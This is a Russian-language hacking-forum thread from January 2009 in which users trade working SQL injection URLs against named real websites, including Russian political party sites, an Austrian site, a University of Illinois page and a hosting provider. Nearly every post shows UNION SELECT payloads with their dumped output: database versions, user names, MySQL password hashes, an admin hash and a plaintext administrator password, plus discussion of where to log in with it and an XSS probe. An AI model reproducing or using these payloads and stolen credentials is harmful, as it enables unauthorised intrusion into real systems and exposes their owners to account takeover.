06.01.2009, 20:02
|
|
Новичок
Регистрация: 26.04.2008
Сообщений: 3
С нами:
9495199
Репутация:
0
|
|
товарищи, поясните плз. как бороться с такими ситуациями:
http://www.respect.at/index.php?lang=1+order+by+3-- все норм.
а вот так
http://www.respect.at/index.php?lang=-1+union+select+1,2,3--
The used SELECT statements have a different number of columns
и хз как подступиться. разъясните если не сложно плз. и таких оч. много на пути попадается.
спасибо.
|
|
|
07.01.2009, 01:18
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
Код:
http://www.respect.at/index.php?lang=1+and+lower(substring(version(),1,11))=char(52,46,48,46,50,55,105,110,111,100,101)
version() - 4.0.27inode
Код:
http://www.respect.at/index.php?lang=1+and+lower(substring(user(),1,32))=char(114,101,48,48,48,51,51,48,64,117,98,104,48,49,45,111,117,116,50,46,117,98,104,46,105,110,111,100,101,46,97,116)
user() - re000330@ubh01-out2.ubh.inode.at
__________________________________________________ _______________________
"Мезотерапия Украины"
Код:
http://www.mesoterapia.org.ua/?mid=-40+union+select+version(),2,3--
|
|
|
|
06.01.2009, 20:02
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Код:
http://www.sinodipc.ru/index.php?id=4+union+select+1,2,3,4,version(),6,7,8,9,10/*
4.1.22-log |
|
|
|
06.01.2009, 20:38
|
|
Познающий
Регистрация: 26.10.2008
Сообщений: 50
С нами:
9232225
Репутация:
62
|
|
Челябинский сайт партии яблоко:
Код:
http://www.chel.yabloko.ru/persons/print.phtml?id=-1+union+select+1,version(),user(),database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
version():5.0.32-Debian_7etch8-log
user():chel@localhost
database():chel
PR:6;тИЦ:2500;
Офиц. сайт главы этой партии:
Код:
http://www.yavlinsky.ru/news/index.phtml?id=-3484+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
version(): 5.0.32-Debian_7etch8-log
user(): gya@localhost
database(): gya
PR:6;тИЦ:750
(login:Администратор; password:adminforever),тока хз куда его вводить.
Офиц. сайт партии родина:
Код:
http://www.rodina-nps.ru/library/print/?id=-60+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,version(),user(),database()),16,17--
version():4.1.22-standard-log
user():rodinad_user@localhost
database():rodinad_test
PR:6;тИЦ:220;
Последний раз редактировалось foopi; 06.01.2009 в 20:40..
|
|
|
|
06.01.2009, 21:11
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
С нами:
9216251
Репутация:
30
|
|
Сообщение от foopi
(login:Администратор;password:adminforever),тока хз куда его вводить.
Возможно тут, сам не пробовал:
h**p://yavlinsky.ru/manager/
|
|
|
|
06.01.2009, 21:21
|
|
Познающий
Регистрация: 26.10.2008
Сообщений: 50
С нами:
9232225
Репутация:
62
|
|
Octave_Parango
не, не подходит
это из таблицы forum_users но к форуму тоже не подходит
|
|
|
|
06.01.2009, 21:33
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
http://www.lymphnotes.com/pro.php/id/68'
дальше чот не прёт
Последний раз редактировалось попугай; 06.01.2009 в 21:40..
|
|
|
|
06.01.2009, 23:18
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
С нами:
10077446
Репутация:
1020
|
|
Сообщение от maxpet1212
товарищи, поясните плз. как бороться с такими ситуациями:
http://www.respect.at/index.php?lang=1+order+by+3-- все норм.
а вот так
http://www.respect.at/index.php?lang=-1+union+select+1,2,3--
The used SELECT statements have a different number of columns
и хз как подступиться. разъясните если не сложно плз. и таких оч. много на пути попадается.
спасибо.
у тебя данные отличаються, то есть сначало при 1+order+by+3--
а при -1+union+select+1,2,3--
то есть вот
http://www.respect.at/index.php?lang= 1+union+select+1,2,3--
Сообщение от попугай
http://www.lymphnotes.com/pro.php/id/68'
дальше чот не прёт
Хуясе, 43 колонки
PHP код:
http://www.lymphnotes.com/pro.php?id=77'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,concat_ws(0x2f,version(),user(),database()),24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43/*
4.0.25/lncom@localhost/lncom
www.watercampws.uiuc.edu - пр6
http://www.watercampws.uiuc.edu/index.php?menu_item_id=-1+union+select+concat_ws(0x2f,user,host,password,f ile_priv)+from+mysql.user+limit+4,1
kaap/%/7522af592a19ac45/Y
kaap:BlankPwd
Последний раз редактировалось AkyHa_MaTaTa; 07.01.2009 в 00:33..
|
|
|
|
07.01.2009, 03:37
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
Хостинг:
Код:
http://www.vianetworks.net/news.php?id=-1+union+select+1,2,concat_ws(0x3a,username,passwd),4,5,6,7,8,9,10,11,12+from+users--
логин/пасс:
Код:
admin:a66cc0703df7a7af2f0624760d098206
------------------------------------------------------------------
The End! |
|
|
|
07.01.2009, 08:36
|
|
Новичок
Регистрация: 16.03.2007
Сообщений: 24
С нами:
10081559
Репутация:
2
|
|
www.watercampws.uiuc.edu - пр6
http://www.watercampws.uiuc.edu/index.php?menu_item_id=-1+union+select+concat_ws(0x2f,user,host,password,f ile_priv)+from+mysql.user+limit+4,1
kaap/%/7522af592a19ac45/Y
kaap:BlankPwd
http://www.watercampws.uiuc.edu:80/index.php?menu_item_id=1<alert(5201314)> 
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
